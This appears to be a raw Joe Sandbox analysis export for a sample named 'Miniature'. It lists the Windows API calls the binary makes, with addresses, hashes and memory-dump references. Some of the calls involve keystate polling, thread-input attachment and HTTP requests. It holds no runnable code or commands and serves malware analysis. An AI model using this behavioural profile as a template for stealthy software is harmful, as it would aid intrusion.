                                                                                                                                                                                                                                                                                            • Opcode ID: cf2f241055485a3a9f96cbcd18fb3e3168f105b770e4748dbb85bcbebb81d5bc
                                                                                                                                                                                                                                                                                            • Instruction ID: f542306527e0416d9beabbf0dc92fa06d2c92d9d0775d707a4d242f8f16c719e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf2f241055485a3a9f96cbcd18fb3e3168f105b770e4748dbb85bcbebb81d5bc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09618B716087019FCB14DF65C888F6EBBE4BF49714F00091AF9869B2A1C770ED49CB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00C88C9C
                                                                                                                                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C88CAC
                                                                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C88CB8
                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C88D55
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C88D69
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C88D9B
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C88DD1
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C88DDA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                            • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateMenu.USER32 ref: 00CA4715
                                                                                                                                                                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 00CA4724
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA47AC
                                                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 00CA47C0
                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00CA47CA
                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CA47F7
                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00CA47FF
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                            • String ID: 0$F
                                                                                                                                                                                                                                                                                            • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C74620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00C728B1
                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 00C728BC
                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 00C728D8
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C728DB
                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00C728E4
                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 00C728F8
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C728FB
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C74620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00C72990
                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 00C7299B
                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 00C729B7
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C729BA
                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00C729C3
                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 00C729D7
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C729DA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CA4539
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CA453C
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CA4563
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CA4586
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CA45FE
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00CA4648
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00CA4663
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00CA467E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00CA4692
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00CA46AF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 265fdda6ea219624b2d5213845182f2484b195bc86565ab1a8212df611fcbfab
                                                                                                                                                                                                                                                                                            • Instruction ID: 27f3d0a4d4151b84b0cc33c0790e3c0597f380d77d47ee10455165bea222a7a3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 265fdda6ea219624b2d5213845182f2484b195bc86565ab1a8212df611fcbfab
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14619F75900249AFDB14DFA4CC81FEE77B8EF4A314F100155FA14E7291C7B4AA45DB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C7BB18
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C7ABA8,?,00000001), ref: 00C7BB2C
                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00C7BB33
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C7ABA8,?,00000001), ref: 00C7BB42
                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C7BB54
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00C7ABA8,?,00000001), ref: 00C7BB6D
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C7ABA8,?,00000001), ref: 00C7BB7F
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C7ABA8,?,00000001), ref: 00C7BBC4
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00C7ABA8,?,00000001), ref: 00C7BBD9
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00C7ABA8,?,00000001), ref: 00C7BBE4
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f55074db48024f368155801adf99c8a0b35ca498e434ba92d70c380054bf8d08
                                                                                                                                                                                                                                                                                            • Instruction ID: 628d77e450abf4acdd42f05b2cd6b4f373c16c5b35cc8f858ef2cc333a67d203
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f55074db48024f368155801adf99c8a0b35ca498e434ba92d70c380054bf8d08
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A319E72904204EFDB189F25DCC8FAD77ADEB49326F108025FE1ADB1A4D7B49E408B64
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C43007
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4DB51,00CE1DC4,00000000,00CE1DC4,00000000,?,00C4DB78,00CE1DC4,00000007,00CE1DC4,?,00C4DF75,00CE1DC4), ref: 00C42D4E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C42D38: GetLastError.KERNEL32(00CE1DC4,?,00C4DB51,00CE1DC4,00000000,00CE1DC4,00000000,?,00C4DB78,00CE1DC4,00000007,00CE1DC4,?,00C4DF75,00CE1DC4,00CE1DC4), ref: 00C42D60
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C43013
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4301E
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C43029
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C43034
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4303F
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4304A
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C43055
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C43060
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4306E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 93605c6832d3908774a570426d44235c8c1e0ccfe64752672cd234904211a543
                                                                                                                                                                                                                                                                                            • Instruction ID: c82065011bf255ba49abd9680d8079329d4ec311a0fa9b58fcf33401afd344f8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93605c6832d3908774a570426d44235c8c1e0ccfe64752672cd234904211a543
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35114276910108AFCB01EF94C942DDD3BA5FF09350BD145A5FA089B222DA32EA51EB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C12AF9
                                                                                                                                                                                                                                                                                            • OleUninitialize.OLE32(?,00000000), ref: 00C12B98
                                                                                                                                                                                                                                                                                            • UnregisterHotKey.USER32(?), ref: 00C12D7D
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00C53A1B
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00C53A80
                                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C53AAD
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                            • String ID: close all
                                                                                                                                                                                                                                                                                            • API String ID: 469580280-3243417748
APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C889F2
• SetCurrentDirectoryW.KERNEL32(?), ref: 00C88A06
• GetFileAttributesW.KERNEL32(?), ref: 00C88A30
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00C88A4A
• SetCurrentDirectoryW.KERNEL32(?), ref: 00C88A5C
• SetCurrentDirectoryW.KERNEL32(?), ref: 00C88AA5
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C88AF5
Strings
Memory Dump Source
• Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
Similarity
• API ID: CurrentDirectory$AttributesFile
• String ID: *.*
• API String ID: 769691225-438819550
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00C174D7
  • Part of subcall function 00C17567: GetClientRect.USER32(?,?), ref: 00C1758D
  • Part of subcall function 00C17567: GetWindowRect.USER32(?,?), ref: 00C175CE
  • Part of subcall function 00C17567: ScreenToClient.USER32(?,?), ref: 00C175F6
• GetDC.USER32 ref: 00C56083
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C56096
• SelectObject.GDI32(00000000,00000000), ref: 00C560A4
• SelectObject.GDI32(00000000,00000000), ref: 00C560B9
• ReleaseDC.USER32(?,00000000), ref: 00C560C1
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C56152
Strings
Memory Dump Source
• Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
APIs
  • Part of subcall function 00C1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C124B0
  • Part of subcall function 00C119CD: GetCursorPos.USER32(?), ref: 00C119E1
  • Part of subcall function 00C119CD: ScreenToClient.USER32(00000000,?), ref: 00C119FE
  • Part of subcall function 00C119CD: GetAsyncKeyState.USER32(00000001), ref: 00C11A23
  • Part of subcall function 00C119CD: GetAsyncKeyState.USER32(00000002), ref: 00C11A3D
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00CA95C7
• ImageList_EndDrag.COMCTL32 ref: 00CA95CD
• ReleaseCapture.USER32 ref: 00CA95D3
• SetWindowTextW.USER32(?,00000000), ref: 00CA966E
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CA9681
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00CA975B
Strings
Memory Dump Source
• Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C8CCB7
                                                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C8CCDF
                                                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C8CD0F
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C8CD67
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 00C8CD7B
                                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00C8CD86
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C555AE,?,?,Bad directive syntax error,00CADCD0,00000000,00000010,?,?), ref: 00C7A236
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00C555AE,?), ref: 00C7A23D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C7A301
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                            • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 00C729F8
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00C72A0D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C72A9A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                            • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00C1758D
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C175CE
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C175F6
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00C1773A
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C1775B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6af7736dbd7534900bd1518886e06e8163f944b0940e30a2ec8018a104e1cca4
                                                                                                                                                                                                                                                                                            • Instruction ID: eb919655ba48cd6979c5ad5b6438217715bfa131b2d20554196ae9fbd80189a0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6af7736dbd7534900bd1518886e06e8163f944b0940e30a2ec8018a104e1cca4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16C18D3890464ADFDB10CFA9C940BEDB7F1FF19314F14851AE8A5E3250DB34AA91EB64
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
